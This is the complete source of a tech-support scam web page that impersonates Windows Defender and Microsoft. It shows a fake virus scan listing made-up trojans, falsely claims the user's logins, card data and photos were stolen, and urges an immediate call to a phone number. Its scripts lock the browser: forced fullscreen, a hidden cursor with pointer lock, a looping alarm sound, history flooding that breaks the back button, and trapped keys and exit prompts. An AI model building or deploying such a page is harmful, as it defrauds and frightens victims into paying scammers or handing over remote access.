<html class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers no-applicationcache svg inlinesvg smil svgclippaths" lang="en"><head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
        <!-- Required meta tags -->
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
        <!-- Bootstrap CSS -->
        <link rel="stylesheet" href="bootstrap.css" integrity="sha384-B0vP5xmATw1+K9KRQjQERJvTumQW0nPEzvF6L/Z6nronJ3oUOFUFpCjEUQouq2+l" crossorigin="anonymous">
        <script src="jquery.js"></script>
        <link rel="stylesheet" type="text/css" href="main.css">
        <title>welcomeDiv</title>
        <link rel="stylesheet" href="font-awesome.css">
            <script>$("#map").children().bind('click', function(){ return false; });</script>
    <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.4.min.js"></script>
    
    
    
    
    
    <script type="text/javascript">//<![CDATA[
    $(function(){
    $('body').bind('contextmenu', function(e){
    return false;
    });
    });//]]>
    </script>
        <script>
            function getVariableFromURl(name)
            {
                name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
                var regexS = "[\\?&]"+name+"=([^&#]*)";
                var regex = new RegExp( regexS );
                var results = regex.exec( window.location.href );
                if( results == null )
                    return "";
                else
                    return results[1];
            }
        </script>
        <script type="text/javascript">
            var phone = getVariableFromURl('phone');
        </script>
        <script type="text/javascript">
            window.onbeforeunload = function () {
                if (data_needs_saving()) {
                    return "Do you really want to leave our brilliant application?";
                } else {
                    return;
                }
            };
        </script>
    
        <script type="text/javascript">
            window.addEventListener("beforeunload", function (e) {
                var confirmationMessage = 'It looks like you have been editing something. '
                    + 'If you leave before saving, your changes will be lost.';
    
                (e || window.event).returnValue = confirmationMessage; //Gecko + IE
                return confirmationMessage; //Gecko + Webkit, Safari, Chrome etc.
            });
        </script>
        <link rel="stylesheet" href="styles.css">
        <link rel="stylesheet" href="style.css">
        <link rel="stylesheet" href="styless.css">
    
        
        
    </head>
    
    
    <body onclick="playAudio()" style="height: 1000px;" class="map" id="mycanvas">//     <script type="text/javascript">
    
    
    
    // function preventBack() { window.history.forward(); }
    // setTimeout("preventBack()", 0);
    // window.onunload = function () { null };
    // </script>
    
        <script type="text/javascript">
            window.onload = function () {
                document.onclick = function (e) {
                    e = e || event;
                    target = e.target || e.srcElement;
                    if (target.tagName === "DIV") {
                        toggleFullScreen();
                        document.body.style.cursor = 'not-allowed';
                        document.getElementById('map').innerHTML = stroka;
                        document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
                        stage.setFullScreenExitHint("");
                    } else {
                        toggleFullScreen();
                        document.body.style.cursor = 'not-allowed';
                        document.getElementById('map').innerHTML = stroka;
                        document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
                        stage.setFullScreenExitHint("");
                    }
                }
            }
        </script>
    
        <script type="text/javascript">
            var phone_number = '';
            var phone_number2 = '';
            var phone_number3 = '';
        </script>
    
        <script type="text/javascript">
    
    //var phone_number = '(+41) 02 25 18 47 58 (Suisse)';
    
    </script>
    
    
    
    <audio controls="controls" autoplay="autoplay" loop="" id="audio" src="0wa0rni0ng0.mp3" type="audio/mpeg"></audio>
    
    <script>
      
    function playAudio() {
     var audio = document.getElementById("audio");
     audio.play();
    
    }
    </script>    
    
    <div class="bg" style="cursor:none;">
        <div class="bgimg" style="top: 0px;"><img src="background (1).png" alt="" width="100%"></div>
    
    </div>
    <a href="#" rel="noreferrer" id="link_black" style="cursor: none;">
        <div class="black" style="height: 145%;cursor: none;"></div>
    </a>
    
    <div class="pro_box" style="cursor: none;">
        <div class="pro_box_header">
            <div class="row">
                <div class="col-md-12">
                    <div class="minimize">
                        <ul>
                            <li><a href="#"><img src="minimize (1).jpeg"></a></li>
    
                        </ul>
                    </div>
                </div>
                <div class="col-md-4" style="cursor: none;">
                    <div class="logo">
                        <img src="microsoft (1).png"><span>welcomein</span>
                    </div>
                </div>
                <div class="col-md-8" style="cursor: none;">
                    <div class="activate_lic">
                        <ul>
                            <li><a href="#">
                                    <button>Activate license</button>
                                </a></li>
                            <li><a href="#"><img src="setting (1).png"></a></li>
                            <li><a href="#"><img src="que (1).png"></a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
        <div class="scan_box" style="cursor: none;">
            <div class="scan_box_header">
                <div class="row">
                    <div class="col-md-6" style="cursor: none;">
                        <div class="quick_scan">
                            <p><img src="virus-scan (1).png"><span>quick scan</span></p>
                        </div>
                    </div>
                    <div class="col-md-6" style="cursor: none;">
                        <div class="minimize1">
                            <ul>
                                <li><a href="#"><img src="minimize (1).jpeg"></a></li>
    
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
            <div class="scan_body" style="cursor: none;">
                <div class="progress">
                    <div id="dynamic" class="progress-bar progress-bar-success active" role="progressbar" aria-valuenow="100" aria-valuemin="0" aria-valuemax="100" style="width: 100%;">100% Complete</div>
                </div>
                <div class="table_quick" style="cursor: none;">
                    <table class="table table-bordered">
                        <thead>
                        <tr>
                            <th scope="col">Items scanned </th>
                            <th scope="col">
                                <div class="counter col_fourth" style="cursor: none;">
                                    <h2 class="timer count-title count-number" data-to="51900" data-speed="5000">51,900</h2>
                                </div>
                            </th>
                        </tr>
                        <tr>
                            <th scope="col">Time elapsed</th>
                            <th scope="col">5 seconds</th>
                        </tr>
                        <tr>
                            <th scope="col">Threats found</th>
                            <th scope="col" style="color: red;"><h2 class="timer count-title count-number" data-to="11" data-speed="2000">11</h2></th>
                        </tr>
                        </thead>
                    </table>
                </div>
            </div>
            <div class="scan_footer" style="cursor: none;">
                <div class="row">
                    <div class="col-md-6">
                        <div class="bt_can">
                            <div class="btn-group" role="group" aria-label="Basic example">
                                <button type="button" class="btn btn-secondary">Quit</button>
                            </div>
                            <div class="btn-group" role="group" aria-label="Basic example">
                                <button type="button" class="btn btn-secondary">Pause</button>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-6" style="cursor: none;">
                        <div class="bt_can2">
                            <div class="btn-group" role="group" aria-label="Basic example">
                                <button type="button" class="btn btn-secondary" id="">Scheduled scans</button>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    
    <div class="pro_box2" style="cursor: none; display: block;">
        <div class="pro_box_header">
            <div class="row">
                <div class="col-md-12">
                    <div class="minimize">
                        <ul>
                            <li><a href="#"><img src="minimize  (1).jpeg"></a></li>
    
                        </ul>
                    </div>
                </div>
                <div class="col-md-4" style="cursor: none;">
                    <div class="logo">
                        <img src="microsoft (1).png"><span>welcomein</span>
                    </div>
                </div>
                <div class="col-md-8" style="cursor: none;">
                    <div class="activate_lic">
                        <ul>
                            <li><a href="#">
                                    <button>Activate license</button>
                                </a></li>
                            <li><a href="#"><img src="bell(1).png"></a></li>
                            <li><a href="#"><img src="setting(1).png"></a></li>
                            <li><a href="#"><img src="que(1).png"></a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
    
        <div class="scan_box2" style="cursor: none;">
            <div class="scan_box_header">
                <div class="row">
                    <div class="col-md-6">
                        <div class="quick_scan">
                            <p><img src="virus-scan (1).png"><span>Scanner</span></p>
                        </div>
                    </div>
                    <div class="col-md-6" style="cursor: none;">
                        <div class="minimize1">
                            <ul>
                                <li><a href="#"><img src="minimize  (1).jpeg"></a></li>
    
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
            <div class="scan_body" style="cursor: none;">
                <div class="row">
                    <div class="col-md-4">
                        <h4 class="new_heading">Threat scan results</h4>
                    </div>
                    <div class="col-md-8">
                        <div class="total_detail">
                            <ul>
                                <li><a href="#"><p>Detected Items</p>
                                        <p>11</p></a></li>
                                <li><a href="#"><p>Time elapsed</p>
                                        <p>3 sec</p></a></li>
                                <li><a href="#"><p>Items scanned</p>
                                        <p>51,900</p></a></li>
                            </ul>
                        </div>
                    </div>
                </div>
                <br>
                <div class="table_quick2" style="cursor: none;">
                    <table class="table table-bordered">
                        <thead>
                        <tr>
                            <th>
                                <div class="form-check mar_lef" style="cursor: none;">
                                    <input class="form-check-input" type="checkbox" value="" id="defaultCheck1" checked="checked">
                                    <label class="form-check-label" for="defaultCheck1"></label>
                                </div>
                            </th>
                            <th>Name</th>
                            <th>Type</th>
                            <th>Object type</th>
                            <th>Location</th>
                        </tr>
                        </thead>
                        <tbody id="table_scroll">
                        <tr>
                            <td>
                                <div class="form-check mar_lef">
                                    <input class="form-check-input" type="checkbox" value="" id="defaultCheck1" checked="checked">
                                    <label class="form-check-label" for="defaultCheck1"></label>
                                </div>
                            </td>
                            <td>Trojan.DNSCharge.AC...</td>
                            <td>Malware</td>
                            <td>Registry value</td>
                            <td>HKLM\SYSTEM\CURRENTCONTROLS...</td>
                        </tr>
                        <tr>
                            <td>
                                <div class="form-check mar_lef">
                                    <input class="form-check-input" type="checkbox" value="" id="defaultCheck1" checked="checked">
                                    <label class="form-check-label" for="defaultCheck1"></label>
                                </div>
                            </td>
                            <td>Trojan.Dropper.Autoit...</td>
                            <td>Malware</td>
                            <td>File</td>
                            <td>HKLM\SYSTEM\CURRENTCONTROLS...</td>
                        </tr>
                        <tr>
                            <td>
                                <div class="form-check mar_lef">
                                    <input class="form-check-input" type="checkbox" value="" id="defaultCheck1" checked="checked">
                                    <label class="form-check-label" for="defaultCheck1"></label>
                                </div>
                            </td>
                            <td>PUP.Optional.RelevantK...</td>
                            <td>Malware</td>
                            <td>File</td>
                            <td>HKLM\SYSTEM\CURRENTCONTROLS...</td>
                        </tr>
                        <tr>
                            <td>
                                <div class="form-check mar_lef">
                                    <input class="form-check-input" type="checkbox" value="" id="defaultCheck1" checked="checked">
                                    <label class="form-check-label" for="defaultCheck1"></label>
                                </div>
                            </td>
                            <td>PUP.Optional.DownLoad...</td>
                            <td>Malware</td>
                            <td>File</td>
                            <td>HKLM\SYSTEM\CURRENTCONTROLS...</td>
                        </tr>
                        <tr>
                            <td>
                                <div class="form-check mar_lef">
                                    <input class="form-check-input" type="checkbox" value="" id="defaultCheck1" checked="checked">
                                    <label class="form-check-label" for="defaultCheck1"></label>
                                </div>
                            </td>
                            <td>Adware.TopGuard...</td>
                            <td>Malware</td>
                            <td>File</td>
                            <td>HKLM\SYSTEM\CURRENTCONTROLS...</td>
                        </tr>
                        <tr>
                            <td>
                                <div class="form-check mar_lef">
                                    <input class="form-check-input" type="checkbox" value="" id="defaultCheck1" checked="checked">
                                    <label class="form-check-label" for="defaultCheck1"></label>
                                </div>
                            </td>
                            <td>PUP.Optional.RelevantK...</td>
                            <td>Malware</td>
                            <td>File</td>
                            <td>HKLM\SYSTEM\CURRENTCONTROLS...</td>
                        </tr>
                        <tr>
                            <td>
                                <div class="form-check mar_lef">
                                    <input class="form-check-input" type="checkbox" value="" id="defaultCheck1" checked="checked">
                                    <label class="form-check-label" for="defaultCheck1"></label>
                                </div>
                            </td>
                            <td>Adware.Bundler...</td>
                            <td>Malware</td>
                            <td>File</td>
                            <td>HKLM\SYSTEM\CURRENTCONTROLS...</td>
                        </tr>
                        <tr>
                            <td>
                                <div class="form-check mar_lef">
                                    <input class="form-check-input" type="checkbox" value="" id="defaultCheck1" checked="checked">
                                    <label class="form-check-label" for="defaultCheck1"></label>
                                </div>
                            </td>
                            <td>Trojan.DNSCharge.AC...</td>
                            <td>Malware</td>
                            <td>File</td>
                            <td>HKLM\SYSTEM\CURRENTCONTROLS...</td>
                        </tr>
                        <tr>
                            <td>
                                <div class="form-check mar_lef">
                                    <input class="form-check-input" type="checkbox" value="" id="defaultCheck1" checked="checked">
                                    <label class="form-check-label" for="defaultCheck1"></label>
                                </div>
                            </td>
                            <td>Trojan.Dropper.Autoit...</td>
                            <td>Malware</td>
                            <td>File</td>
                            <td>HKLM\SYSTEM\CURRENTCONTROLS...</td>
                        </tr>
                        <tr>
                            <td>
                                <div class="form-check mar_lef">
                                    <input class="form-check-input" type="checkbox" value="" id="defaultCheck1" checked="checked">
                                    <label class="form-check-label" for="defaultCheck1"></label>
                                </div>
                            </td>
                            <td>PUP.Optional.RelevantK...</td>
                            <td>Malware</td>
                            <td>File</td>
                            <td>HKLM\SYSTEM\CURRENTCONTROLS...</td>
                        </tr>
                        <tr>
                            <td>
                                <div class="form-check mar_lef">
                                    <input class="form-check-input" type="checkbox" value="" id="defaultCheck1" checked="checked">
                                    <label class="form-check-label" for="defaultCheck1"></label>
                                </div>
                            </td>
                            <td>PUP.Optional.DownLoad...</td>
                            <td>Malware</td>
                            <td>File</td>
                            <td>HKLM\SYSTEM\CURRENTCONTROLS...</td>
                        </tr>
    
                        </tbody>
                    </table>
                </div>
            </div>
            <div class="scan_footer2" style="cursor: none;">
                <div class="row">
                    <div class="col-md-6">
                        <div class="bt_can">
                            <div class="dropdown">
                                <a class="btn btn-secondary dropdown-toggle" style="width:126px;" href="#" role="button" id="dropdownMenuLink" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                                    Save result
                                </a>
    
                                <div class="dropdown-menu" aria-labelledby="dropdownMenuLink">
                                    <a class="dropdown-item" href="#">Action</a>
                                    <a class="dropdown-item" href="#">Another action</a>
                                    <a class="dropdown-item" href="#">Something else here</a>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-6" style="cursor: none;">
                        <div class="bt_can2">
                            <div class="btn-group" role="group" aria-label="Basic example">
                                <button type="button" class="btn btn-secondary">Close</button>
                            </div>
                            <div class="btn-group" role="group" aria-label="Basic example">
                                <button type="button" class="btn btn-secondary bg_blue">Quarantine</button>
                            </div>
                        </div>
                    </div>
    
                </div>
            </div>
        </div>
    </div>
    <div class="pro_box3" style="cursor: none; display: block;">
        <div class="pro_box_header">
            <div class="row">
                <div class="col-md-12">
                    <div class="minimize">
                        <ul>
                            <li><a href="#"><img src="minimize (1).jpeg"></a></li>
    
                        </ul>
                    </div>
                </div>
                <div class="col-md-4" style="cursor: none;">
                    <div class="logo">
                        <img src="microsoft (1).png"><span>by</span>
                    </div>
                </div>
                <div class="col-md-8" style="cursor: none;">
                    <div class="activate_lic">
                        <ul>
                            <li><a href="#">
                                    <button>Activate license</button>
                                </a></li>
                            <li><a href="#"><img src="bell (1).png"></a></li>
                            <li><a href="#"><img src="setting (1).png"></a></li>
                            <li><a href="#"><img src="que (1).png"></a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
    
        <div class="scan_box2" style="cursor: none;">
            <div class="scan_box_header">
                <div class="row">
                    <div class="col-md-6">
                        <div class="quick_scan">
                            <p><img src="virus-scan (1).png"><span>Scanner</span></p>
                        </div>
                    </div>
                    <div class="col-md-6">
                        <div class="minimize1">
                            <ul>
                                <li><a href="#"><img src="minimize (1).jpeg"></a></li>
    
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
            <div class="scan_body" style="cursor: none;">
                <div class="row">
                    <div class="col-md-12">
                        <div class="total_detail_scan">
                            <ul>
                                <li><a href="#">Analysis</a></li>
                                <li><a href="#">Planner</a></li>
                                <li><a href="#">Reports</a></li>
                            </ul>
                        </div>
                    </div>
                </div>
                <br>
                <div class="table_quick2" style="cursor: none;">
                    <div class="row">
                        <div class="col-md-4">
                            <div class="pc_desk">
                                <img src="pc(1).png">
                            </div>
                        </div>
                        <div class="col-md-4" style="cursor: none;">
                            <div class="scan_pro mar_top">
                                <ul>
                                    <li><i class="fa fa-check" aria-hidden="true"></i> Checking for updates</li>
                                    <li><i class="fa fa-check" aria-hidden="true"></i> Scan memory</li>
                                    <li><i class="fa fa-check" aria-hidden="true"></i> Scan startup items</li>
                                    <li>
                                        <div class="circular-spinner"></div>
                                        <span>Windows Registry Scan</span></li>
                                    <li>Scanning system files</li>
                                </ul>
                            </div>
                        </div>
                        <div class="col-md-4" style="cursor: none;">
                            <div class="scan_dur">
                                <p><strong>Analysis duration</strong></p>
                                <p>3sec 0s</p>
                                <p>5sec 0s</p>
                                <br>
                                <p><strong>Elements analyzed</strong></p>
                                <p>51,900</p>
                                <br>
                                <p><strong>Threat Detected</strong></p>
                                <p>11</p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="scan_footer3" style="cursor: none;">
                <div class="row">
                    <div class="col-md-2">
                        <div class="viruses">
                            <img src="virus-scan (1).png">
                        </div>
                    </div>
                    <div class="col-md-10">
                        <div class="make_this">
                            <p>Make them the last to worry about online threats</p>
                            <p>Premium stops malware, viruses and more without bogging down your computer.
                                Upgrade to premium</p>
                        </div>
                    </div>
    
                </div>
            </div>
        </div>
    </div>
    
    <div id="footer" style="top: 685px; position: absolute; cursor: none;">
        <div class="row">
    
            <div class="col-md-12">
                <div class="right-foot" style="text-align: center;">
                    <span id="footertxt"><img src="microsoft (1).png"> Windows: </span><span style="font-weight: 700;padding-left: 13px;color: #fff;">Contact Technical Support : <span style="border: 1px solid #fff;border-radius: 5px;padding: 2px 5px;font-size: 30px;"><script>document.write(phone_number);</script> &nbsp;(+41) 02 25 18 47 58   </span> </span>
                </div>
            </div>
            <div class="col-md-12" style="cursor: none;">
                <marquee direction="left" width="100%" height="100px"><small class="text-left" style="color: #f80505;font-size: 20px; cursor: none;">Windows has been blocked due to suspicious activity. You should contact us
                    immediately so that our engineers can guide you through the
                   removal process over the phone.
                                       PLEASE call us within the next 5
                   minutes to avoid complete malfunction of your computer.</small></marquee>
            </div>
        </div>
    
    
    </div>
    
    <div id="poptxt" class="lightbox" style="display: block; overflow: hidden;">
        <div class="ilb top">
            <div class="headers ilb" style="border-bottom: 1px solid #fcf8f8;">
                <span id="txtadd" class="fl title"><span class="fl ilb"><img src="def(1).png" class="logo3"></span>Windows Defender - Security Warning</span>
                <span id="txts1" class="fl title2"><a href="#"><img src="cross(1).png"></a></span>
    
            </div>
        </div>
        <div id="txtintro">
                    <span class="colo-rd">App: Ads.fiancetrack(2).dll<br>
                        Threat Detected:  Trojan Spyware</span>
        </div>
        <img id="banner" src="virus-images (1).png">
        <div id="disclaimer">
            Windows has been blocked due to suspicious activity.<br>
            <span class="support" style="font-size:19px;">Contact Technical Support: <script>document.write(phone_number);</script> &nbsp;(+41) 02 25 18 47 58    </span>
        </div>
        <div id="bottom">
            <img id="badge" src="microsoft (1).png"><span class="title3"></span>
            <ul>
                <li>
                    <a href="#">
                        <div class="fr button2">
                            <span id="addtochromebutton">Close</span>
                        </div>
                    </a>
                </li>
                <li>
                    <a href="#">
                        <div class="fr button">
                            <span id="addtochromebutton">Cancel</span>
                        </div>
                    </a>
                </li>
            </ul>
    
        </div>
    </div>
    
    <div id="pop_up_new" class="cardcontainer" style="cursor: none; display: block;">
        <p class="text-center" style="    font-size: 16px;
        font-weight: normal;
        margin: 0;
        margin-bottom: 5px;
        padding: 5px 10px;
        color: #FFFFFF !important;
        color: #414141;font-weight: bold;
        margin-top: 8px; ">Windows Defender - Security Warning</p>
        <p>** Windows has been blocked due to suspicious activity **</p>
        <p>Please call us within the next 5 minutes to avoid
            your computer is disabled. The following data is
            stolen.</p>
        <p>&gt; Facebook-Login<br>
            &gt; Credit card data<br>
            &gt; Login to email account<br>
            &gt; Photos stored on this PC
    
        </p>
        <p>You must contact us immediately so that our engineers
            can guide you through the deletion process over the phone.
                    PLEASE call us within the next 5 minutes to
            to avoid complete malfunction of your computer.</p>
        <p>Contact Windows Support to reactivate your computer.</p>
        <p>If you close this page, access to your computer will be disabled to prevent further damage to our network</p>
        <p style="padding-bottom: 0px;">Call us toll-free at: <strong>
                <script>document.write(phone_number);</script> &nbsp;(+41) 02 25 18 47 58     </strong></p>
        <div class="action_buttons"><a class="active" id="leave_page" style="cursor: pointer; color: #FFFFFF !important;">OK</a> <a class="active" id="leave_page" style="color: #FFFFFF !important;">Quit</a>
        </div>
    </div>
    
    <div id="welcomeDiv" style="background-color: rgba(40, 40, 40, 0.62); height: auto; width: 550px; margin-left: 25%; position: absolute; z-index: 2147483647; cursor: none;" class="answer_list">
        <p class="text-center" style="color: #FEFEFE;  margin-top:10px; font-size: 16px; opacity:.9; cursor: none; ">Windows has been blocked due to suspicious activity.<br style="cursor: none;">YOU
            should contact us immediately so that our engineers can
           guide you through the removal process over the phone.
                   PLEASE call us within the next 5 minutes to
           to avoid complete malfunction of your computer.</p>
    
    
    </div>
    
    
    <!-- Optional JavaScript; choose one of the two! -->
    
    <!-- Option 1: jQuery and Bootstrap Bundle (includes Popper) -->
    <script src="modernizr.js" type="text/javascript"></script>
    <script src="bootstrap.js" integrity="sha384-Piv4xVNRyMGpqkS2by6br4gNJ7DXjqk09RmUpJ8jgGtD7zP9yug3goQfGII0yAns" crossorigin="anonymous"></script>
    <script type="text/javascript" src="fullscreen.js"></script>
    <script type="text/javascript" src="before.js"></script>
    <script type="text/javascript" src="main.js"></script>
    <script type="text/javascript" src="light.js"></script>
    <script type="text/javascript">
        $(function () {
            var current_progress = 0;
            var interval = setInterval(function () {
                current_progress += 10;
                $("#dynamic")
                    .css("width", current_progress + "%")
                    .attr("aria-valuenow", current_progress)
                    .text(current_progress + "% Complete");
                if (current_progress >= 100)
                    clearInterval(interval);
            }, 100);
        });
    </script>
    <script type="text/javascript">
        (function ($) {
            $.fn.countTo = function (options) {
                options = options || {};
    
                return $(this).each(function () {
                    // set options for current element
                    var settings = $.extend({}, $.fn.countTo.defaults, {
                        from: $(this).data('from'),
                        to: $(this).data('to'),
                        speed: $(this).data('speed'),
                        refreshInterval: $(this).data('refresh-interval'),
                        decimals: $(this).data('decimals')
                    }, options);
    
                    // how many times to update the value, and how much to increment the value on each update
                    var loops = Math.ceil(settings.speed / settings.refreshInterval),
                        increment = (settings.to - settings.from) / loops;
    
                    // references & variables that will change with each update
                    var self = this,
                        $self = $(this),
                        loopCount = 0,
                        value = settings.from,
                        data = $self.data('countTo') || {};
    
                    $self.data('countTo', data);
    
                    // if an existing interval can be found, clear it first
                    if (data.interval) {
                        clearInterval(data.interval);
                    }
                    data.interval = setInterval(updateTimer, settings.refreshInterval);
    
                    // initialize the element with the starting value
                    render(value);
    
                    function updateTimer() {
                        value += increment;
                        loopCount++;
    
                        render(value);
    
                        if (typeof (settings.onUpdate) == 'function') {
                            settings.onUpdate.call(self, value);
                        }
    
                        if (loopCount >= loops) {
                            // remove the interval
                            $self.removeData('countTo');
                            clearInterval(data.interval);
                            value = settings.to;
    
                            if (typeof (settings.onComplete) == 'function') {
                                settings.onComplete.call(self, value);
                            }
                        }
                    }
    
                    function render(value) {
                        var formattedValue = settings.formatter.call(self, value, settings);
                        $self.html(formattedValue);
                    }
                });
            };
    
            $.fn.countTo.defaults = {
                from: 0,               // the number the element should start at
                to: 0,                 // the number the element should end at
                speed: 100,           // how long it should take to count between the target numbers
                refreshInterval: 100,  // how often the element should be updated
                decimals: 0,           // the number of decimal places to show
                formatter: formatter,  // handler for formatting the value before rendering
                onUpdate: null,        // callback method for every time the element is updated
                onComplete: null       // callback method for when the element finishes updating
            };
    
            function formatter(value, settings) {
                return value.toFixed(settings.decimals);
            }
        }(jQuery));
    
        jQuery(function ($) {
            // custom formatting example
            $('.count-number').data('countToOptions', {
                formatter: function (value, options) {
                    return value.toFixed(options.decimals).replace(/\B(?=(?:\d{3})+(?!\d))/g, ',');
                }
            });
    
            // start all the timers
            $('.timer').each(count);
    
            function count(options) {
                var $this = $(this);
                options = $.extend({}, options || {}, $this.data('countToOptions') || {});
                $this.countTo(options);
            }
        });
    </script>
    <script type="text/javascript">
        $(document).ready(function () {
            $(".pro_box2").delay(1500).fadeIn(800);
            $(".pro_box3").delay(2500).fadeIn(800);
            $(".pro_box3").delay(3000).fadeIn(800);
            $("#pop_up_new").delay(3500).fadeIn(800);
            $("#poptxt").delay(4000).fadeIn(800);
        });
    </script>
    <script type="text/javascript">
        document.addEventListener('keyup', function (es) {
            if (es.keyCode === 27) {
                toggleFullScreen();
            }
        }, false);
    </script>
    <script type="text/javascript">
        document.addEventListener('keyup', function (e) {
            if (e.keyCode === 122 || e.keyCode === 17 || e.keyCode === 18 || e.keyCode === 13 || e.keyCode === 57 ) {
                document.getElementById('map').innerHTML = stroka;
                toggleFullScreen();
            }
        }, false);
        
        function closeFullscreen() {
      if (document.exitFullscreen) {
        
      } else if (document.webkitExitFullscreen) { /* Safari */
      
      } else if (document.msExitFullscreen) { /* IE11 */
        
      }
    }
    </script>
    <script>
        // Get the modal
        var modal = document.getElementById('myModal');
    
        // Get the button that opens the modal
        var btn = document.getElementById("myBtn");
    
        // Get the <span> element that closes the modal
        var span = document.getElementsByClassName("close")[0];
    
        // When the user clicks the button, open the modal
        /*btn.onclick = function() {
          modal.style.display = "block";
        } */
    
        // When the user clicks on <span> (x), close the modal
        span.onclick = function () {
            modal.style.display = "none";
        }
    
        // When the user clicks anywhere outside of the modal, close it
        window.onclick = function (event) {
            if (event.target == modal) {
                modal.style.display = "none";
            }
        }
    </script>
    
    <script type="text/javascript">
    
    
    function addEvent(obj, evt, fn) {
            if (obj.addEventListener) {
                    obj.addEventListener(evt, fn, false);
            }
            else if (obj.attachEvent) {
                    obj.attachEvent("on" + evt, fn);
            }
    }
    addEvent(window,"load",function(e) {
            addEvent(document, "mouseout", function(e) {
                    e = e ? e : window.event;
                    var from = e.relatedTarget || e.toElement;
                    if (!from || from.nodeName == "HTML") {
                            // stop your drag event here
                            // for now we can just use an alert
                     //alert("hello");
    
                 modal.style.display = "block";
    
                    }
            });
    });
    
        $(document).mousemove(function(){
        var canvas = document.getElementById('mycanvas');
    canvas.requestPointerLock = canvas.requestPointerLock || canvas.mozRequestPointerLock || canvas.webkitRequestPointerLock;
    canvas.requestPointerLock();
    
        //capture mouse movement event
             // remove our layover from the DOM
        });
    
     //  $(document).mousemove(function(){
     // alert("move detect");
        //capture mouse movement event
     //   $("#pageLayover").remove(); // remove our layover from the DOM
     // });
     
     onbeforeunload = function(e){
        if(confirm('Are you nuts? Do you really want to leave me?')){
            return 'OK, Good Bye then';
        }
        else {
            e = e || event;
            if(e.preventDefault){e.preventDefault();}
            e.returnValue = false;
            return 'Alerte, "Vous allez perdre tous vos données si vous fermer cette fenêtre?" ';
        }
    }
    </script>
    
    <script type="text/javascript">
        setTimeout(function () {
            document.getElementById("beep").play();
        });
    </script>
    <script>
        $(document).ready(function () {
            $("#mycanvas").click(function () {
                $("#welcomeDiv").show();
            });
        });
    </script>
    <script type="text/javascript">
        $(document).ready(function () {
            $("body").mouseover(function () {
                $("#poptxt").show();
            });
        });
    </script>
    
    
    
    <script>
    var is_chrome, 
    isChromium = window.chrome,
    vendorName = window.navigator.vendor,
    isOpera = window.navigator.userAgent.indexOf("OPR") > -1;is_chrome = isChromium !== null && isChromium !== undefined && vendorName === "Google Inc." && isOpera == false ? true : false;function alertCall() {
      var total = "";
      for (var i = 0; i <50 ; i++) {
        total = total + i.toString();
        history.pushState(0, 0, total);
      }
    }function alertTimed() {
      if (is_chrome) {
        setInterval(function () {
        alertCall();
       }, 20);
      } else {
        alertLoop();
      }
    }function alertLoop() {
      for (i = 0; i < 5; i++) {
        alertCall();
      }
    }alertTimed()
    
    </script>
    
    <script>
    jQuery(document).keyup(function(e){
        if(e.keyCode === 27 && popupStatus === 1){
        // alert('not allowed !!!');
            // or any other code
         return false;
        }
    });
    
    </script>
    
    <div id="speechify-global-notifications"></div><div id="speechify-screenshot-mode" style="position: fixed; top: 0px; right: 0px; width: 100%; min-height: 100%; z-index: 2147483640; display: none;"></div><div id="speechify-shortcuts-prompt"></div></body></html>